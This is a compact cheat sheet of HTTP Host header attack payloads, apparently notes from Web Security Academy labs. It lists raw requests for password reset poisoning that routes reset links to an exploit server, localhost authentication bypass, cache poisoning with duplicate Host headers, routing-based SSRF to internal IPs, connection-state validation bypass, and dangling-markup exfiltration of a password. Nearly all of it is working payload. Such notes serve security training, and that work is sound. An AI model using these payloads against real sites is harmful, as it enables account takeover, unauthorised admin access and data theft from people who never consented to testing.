##### Host Header β Basic password reset poisoning
```http
POST /forgot-password HTTP/1.1
Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
Content-Type: application/x-www-form-urlencoded
username=carlos
```
Context: Reset link in email built directly from `Host` header.
Encoding: None β raw header injection.
Source: [[1. Basic password reset poisoning]]
---
##### Host Header β Authentication bypass (`localhost`)
```http
GET /admin HTTP/1.1
Host: localhost
```
Context: Privilege decision based on `Host`; βlocalhostβ treated as internal.
Encoding: None.
Source: [[2. Host header authentication bypass]]
---
##### Host Header β Web cache poisoning via duplicate Host
```http
GET /?cb=123 HTTP/1.1
Host: LAB-ID.web-security-academy.net
Host: EXPLOIT-SERVER-ID.exploit-server.net
```
Context: Cache parses first Host, backend parses second; malicious resource cached for victims.
Encoding: None β duplicate header smuggling.
Source: [[3. Web cache poisoning via ambiguous requests]]
---
##### Host Header β Routing-based SSRF
```http
GET /admin HTTP/1.1
Host: 192.168.0.1
```
Context: Host header used for backend routing; internal IP reachable from frontend.
Encoding: None.
Source: [[4. Routing-based SSRF]]
---
##### Host Header β Flawed request parsing
```http
GET https://LAB-ID.web-security-academy.net/ HTTP/1.1
Host: 192.168.0.55
```
Context: Backend validates absolute-URL host, ignores `Host` header β SSRF possible.
Encoding: None.
Source: [[5. SSRF via flawed request parsing]]
---
##### Host Header β Connection state attack (keep-alive)
```http
GET / HTTP/1.1
Host: LAB-ID.web-security-academy.net
Connection: keep-alive
GET /admin HTTP/1.1
Host: 192.168.0.1
```
Context: Host validation only on first request per TCP connection; second request inherits routing.
Encoding: None β sequence over single connection.
Source: [[6. Host validation bypass via connection state attack]]
---
##### Host Header β Password reset poisoning via dangling markup
```http
POST /forgot-password HTTP/1.1
Host: LAB-ID.web-security-academy.net:'<a href="//EXPLOIT-SERVER-ID.exploit-server.net/?
Content-Type: application/x-www-form-urlencoded
username=carlos
```
Context: Raw HTML email view unsanitized; dangling markup exfiltrates plaintext password.
Encoding: None β HTML injection via Host.
Source: [[7. Password reset poisoning via dangling markup]]